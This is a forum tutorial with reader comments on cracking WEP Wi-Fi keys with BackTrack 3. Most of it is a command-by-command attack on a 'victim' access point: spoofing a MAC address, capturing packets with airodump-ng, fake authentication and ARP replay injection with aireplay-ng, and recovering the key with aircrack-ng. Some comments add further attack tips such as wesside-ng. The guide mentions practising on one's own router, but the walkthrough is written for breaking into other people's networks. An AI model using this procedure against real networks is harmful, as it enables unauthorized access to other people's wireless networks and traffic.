Donate to us via Paypal!
The measure of a mans life is not how well he dies, but how well he lives.
Saturday, June 12, 2021
 Need Help?
Members Online
Total Online: 135
Guests Online: 135
Members Online: 0

Registered Members: 137253
Newest Member: Louisprelf
Latest Articles

Cracking Wep Keys With BackTrack

Arrow Image Guide to cracking wep keys for BEGINNERS!

By: Exidous

This is my first tutorial.... I hope this helps all of you that just don't know where to start or don't know how to crack wep...
What you will need

* 1 copy of BackTrack 3 *newest release* (GOOGLE IT)
* 1 wireless router
* Laptop with wireless capabilities/wireless card -- There are a few cards that can't do the injection!!!
* A secure place to work (so you don't disturb other AP's)

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP.

Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON'T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the victims bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Duble click the home icon, rigt click the blank white area and select create new Txt File name it exidous or what ever you want! click ok, now close the window.

Ok let's start!
Commands | Meaning

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down

* Ok now just to make things simpler, so we don't have to hunt down what our Mac address is
macchanger --mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP's
airmon-ng start (device)

* Lets start seeing what AP's are there
airodump-ng (device)

* After you see all the AP's execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of victom

* Now on to the victim's AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous --bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV's for 128 bit encryption
aircrack-ng -n 64 --bssid (bssid) exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930

I hope this tut. Helped!!! If so please send $$.... JK!!! Just leave a comment and rate it!


Frost_Ton March 09 2008 - 07:14:14
Good article. Though faking the mac address doesn't always work 100%. I set up a wireless network to play around with BT3, and I had trouble arp injecting with a fake mac address, then I switched it back to my original and presto, problem solved... A little advise for the article however, go more into detail with the commands, didn't feel like I got a good enough explanation of those. Good work though, keep it up.
richohealeyon March 09 2008 - 16:39:02
you're a paint by numbers skid.
exidouson March 10 2008 - 14:04:33
Well thanks for taking the time to look at it.. and i am going to do a second article, but it will be on how to do Chop Chop method... and I will go a little further in detail about the commands, and other commands you can use! (Make it totally noob friendly)
Uber0non March 11 2008 - 06:50:38
This sure is useful information, but it doesn't explain how anything works. Just a step-by-step skiddie guide Frown
sacmanon March 29 2008 - 22:01:41
nice one but you use the old methods backtack 3 has wesside-ng wesside-ng -i (device) ofcouse u have to put the card in monitor mode either using airmone-ng or wlanconfig
daniel11uson April 02 2008 - 02:42:21
Great article, i was having a lot of trouble with backtrack (im not that much of a linux guy)...
root_opon November 11 2008 - 22:21:39
Everybody take a good look, this is a quality example of spoon-feeding. rated poor, for.. obvious reasons.
SQuirreLon November 29 2008 - 16:32:48
I just got my BackTrack 3 installed on my Eee PC 901 a few days ago. Too bad that the WLAN chip inside 901 isn't injection capable.
Blunton February 03 2009 - 17:26:53
Great but with step 7 -w exdious if your using a live cd you need to format a usb drive with ext.3 by using mkfs.ext /dev/(your device) so you can save your ivs -w /dev/sda1 or what evre usb is mounted to sdc1 sda1 hda1 whatever
exidouson March 05 2009 - 14:14:47
@ Blunt "Go smoke another one!" Your completely wrong. I have never installed babcktrack3. I have always ran it from cd or usb, And have never had a problem with step 7. All you have to do is open the home folder on desktop right click and make a txt file name it what ever u want... That is all.
UnsungMasteron May 16 2009 - 18:15:58
I agree with Uber0n, I'd rather not be stuck knocking unwanted clients off my network.
white mirageon July 21 2009 - 04:28:05
what are some good usb wireless adapters that support injection? My netbook (Acer Aspire One) doesn't. PM if anyone knows any. In the mean time, I'll Google it. thanks.
ferasdouron March 24 2010 - 07:42:45
it's late to be asking this, but did mirage find any usb's for injection that function well with acers? also, it might be slower, but you can still crack it with acers. highly sudguest using password files though. also, check into airbase for acer tops. it proves usefull sometimes. Wish I could find an easier way to see what computer bssid's are connected to the router though....
Post Comment


You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.